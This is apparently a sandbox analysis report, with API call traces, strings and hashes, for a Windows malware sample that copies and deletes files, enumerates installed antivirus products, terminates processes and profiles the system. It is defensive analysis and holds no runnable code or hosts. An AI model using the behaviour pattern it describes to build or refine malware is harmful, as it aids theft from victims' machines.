                                                                                                                                                                                                                                              control_flow_graph 2745 407440-407478 call 410090 2748 40762b-40763f call 410090 2745->2748 2749 40747e-407486 call 40feb0 2745->2749 2755 407641 2748->2755 2756 40764b-407659 call 410090 2748->2756 2752 40748b-407527 call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 4100c0 * 2 CopyFileA 2749->2752 2794 407567-40757f call 40fe20 2752->2794 2795 407529 2752->2795 2755->2756 2756->2752 2761 40765f-407696 call 40fea0 * 4 2756->2761 2780 407b9d-407bc4 call 40fea0 * 2 2761->2780 2800 407585-407626 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 2794->2800 2801 40769b-407783 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ffe0 call 40ff00 call 40fea0 2794->2801 2797 407530-407565 call 40fe60 call 411a20 call 4100c0 * 2 CopyFileA 2795->2797 2797->2794 2854 407786-4077a7 call 40fea0 call 4100c0 2800->2854 2801->2854 2866 4077ad-4077ca 2854->2866 2867 407b2f-407b41 call 4100c0 DeleteFileA call 410070 2854->2867 2874 4077d0-4077f6 GetProcessHeap RtlAllocateHeap 2866->2874 2875 407b18-407b2c 2866->2875 2877 407b46-407b99 call 410070 call 40fea0 * 6 2867->2877 2882 407aa6-407ab3 lstrlen 2874->2882 2883 4077fc-407802 2874->2883 2875->2867 2877->2780 2887 407ab5-407af5 lstrlen call 40fe60 call 401120 call 4153e0 2882->2887 2888 407b08-407b15 memset 2882->2888 2886 407804-4078bd call 40fe20 * 6 call 410090 2883->2886 2927 4078c8-4078cd 2886->2927 2928 4078bf-4078c6 2886->2928 2903 407afa-407b03 call 40fea0 2887->2903 2888->2875 2903->2888 2929 4078ce-4078e2 call 40feb0 call 410090 2927->2929 2928->2929 2934 4078e4-4078eb 2929->2934 2935 4078ed-4078f3 2929->2935 2936 4078f4-407909 call 40feb0 call 4100b0 2934->2936 2935->2936 2941 407918-407aa0 call 4100c0 lstrcat * 2 call 4100c0 lstrcat * 2 call 4100c0 lstrcat * 2 call 4100c0 lstrcat * 2 call 4100c0 lstrcat * 2 call 4100c0 lstrcat * 2 call 407110 call 4100c0 lstrcat call 40fea0 lstrcat call 40fea0 * 6 2936->2941 2942 40790b-407913 call 40feb0 2936->2942 2941->2882 2941->2886 2942->2941
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,00F79B08,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00F70418,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040751F
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040755D
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004077D6
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00000000), ref: 00407925
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00426A98), ref: 00407934
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00000000), ref: 00407947
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00426A9C), ref: 00407956
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00000000), ref: 00407969
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00426AA0), ref: 00407978
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00000000), ref: 0040798B
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00426AA4), ref: 0040799A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00000000), ref: 004079AD
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00426AA8), ref: 004079BC
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00000000), ref: 004079CF
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00426AAC), ref: 004079DE
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00000000), ref: 00407A25
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(000000FF,00426AB0), ref: 00407A43
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(000000FF), ref: 00407AAA
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(000000FF), ref: 00407AB9
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 004077DD
                                                                                                                                                                                                                                                • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                • Part of subcall function 00411A20: memset.MSVCRT ref: 00411A55
                                                                                                                                                                                                                                                • Part of subcall function 00411A20: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407546,0040DA84), ref: 00411A86
                                                                                                                                                                                                                                                • Part of subcall function 00411A20: HeapAlloc.KERNEL32(00000000,?,00407546,0040DA84), ref: 00411A8D
                                                                                                                                                                                                                                                • Part of subcall function 00411A20: wsprintfW.USER32 ref: 00411A9C
                                                                                                                                                                                                                                                • Part of subcall function 00411A20: OpenProcess.KERNEL32(00001001,00000000), ref: 00411AFD
                                                                                                                                                                                                                                                • Part of subcall function 00411A20: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B0C
                                                                                                                                                                                                                                                • Part of subcall function 00411A20: CloseHandle.KERNEL32(00000000), ref: 00411B13
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00407B10
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,?,?,?,00426A62), ref: 00407B38
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$HeapProcesslstrlen$File$Copymemset$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimewsprintf
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2919035586-0
                                                                                                                                                                                                                                              • Opcode ID: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
                                                                                                                                                                                                                                              • Instruction ID: ac20bff3860d788065b8a73e72d727c9ff0ab2c095c62357def0f70ed4808e92
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63325F71900248EACB14EBE4DD55BEEBB79AF19308F10417EF50273292DB786A08CB65
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00412350 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00412396
                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 00412423
                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 00412460
                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 004124A9
                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 004124F2
                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 0041253A
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,true,?), ref: 004126C5
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00412752
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                                                              • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                              • Opcode ID: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                              • Instruction ID: 9783b729b2b96f1e089f7dd286e8eef65b2713682f5ee12b46c125a55e388804
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce137c0223425141530cf3f77ebad13e5dede02dc8e5628b2fc49f88788a9856
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEC10A75800109EFDB14EBA4DD85EDEB779AF05304F00816EF616A3292DA385789CBA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 004111E0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 136comCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                • Part of subcall function 004115F0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004112EB,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000), ref: 004115F8
                                                                                                                                                                                                                                                • Part of subcall function 004115F0: CharToOemW.USER32(?,00000000), ref: 00411605
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004112FD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                              • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                              • API String ID: 685420537-2776955613
                                                                                                                                                                                                                                              • Opcode ID: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                              • Instruction ID: 771bfa06b1ee6aab49511a194e20b68bd9ee86493e24a2358091a886c33ff084
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1415A71B01229ABCB24DB95DC45EEFBB78EF49B50F10411AF615A7290C678AA01CBE4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00418490 Relevance: 10.6, APIs: 7, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(00000000,00F6ADD8), ref: 004185C0
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AD30), ref: 004185ED
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AF10), ref: 00418606
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AD00), ref: 0041861E
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AE80), ref: 00418636
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6E998), ref: 0041864F
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F73C18), ref: 00418667
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F73C98), ref: 0041867F
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AFE8), ref: 00418698
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AFD0), ref: 004186B0
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AEC8), ref: 004186C8
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6ADC0), ref: 004186E1
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F73BF8), ref: 004186F9
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AF58), ref: 00418711
                                                                                                                                                                                                                                                • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,00F6AEB0), ref: 0041872A
                                                                                                                                                                                                                                                • Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                • Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                • Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                • Part of subcall function 00401090: CreateDCA.GDI32(00F6E9C8,00000000,00000000,00000000), ref: 0040109D
                                                                                                                                                                                                                                                • Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
                                                                                                                                                                                                                                                • Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1
                                                                                                                                                                                                                                                • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00F6E978,?,00401074,00F6E978,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00F6E978,?,00401074,00F6E978,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00F6E978), ref: 00410247
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00F6E978,?), ref: 0041001C
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F6E978,?,00427854,?,00000000,0042738B), ref: 00418526
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418531
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00001B58), ref: 0041853C
                                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418552
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041856C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041857A
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00418582
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3108587868-0
                                                                                                                                                                                                                                              • Opcode ID: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                              • Instruction ID: 55b900fef8fb81f1d8c87853b9dcba1fdba1e1d9fc668c1e9ac9258d03b45c33
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A214F319001046ADB10F7F1ED56FEE7769AF15749F50017EB602B20E2EF782A44C6A9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00404430 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringnetworkCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                              • API String ID: 1274457161-4251816714
                                                                                                                                                                                                                                              • Opcode ID: 373b4779b2ebc8742b969e618a81eedf206de4bf232f78d02da3801961b718bb
                                                                                                                                                                                                                                              • Instruction ID: b34fd57166b640466ff53f1d7e025f9f2fa8d164da18c3b6a8d9ee5040319ab5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 373b4779b2ebc8742b969e618a81eedf206de4bf232f78d02da3801961b718bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A2190B1900308ABDB10DFA4D845BDE7BB8FB05724F10022AFA14A72C1DB785A45CB94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 004101A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00F70BF8,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004101FF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2095584347.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2095584347.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                              • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                              • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                                              • Opcode ID: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                              • Instruction ID: 19236cbb0df9c8bc93342aa8950c0f55e3fb02da4f2605f2dcdb39d085d0879d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADF062B9941224FBE710DBE0EC4AFAB7B7DEB09B01F001155FB0596281E6B46A4487B5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 00417380 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
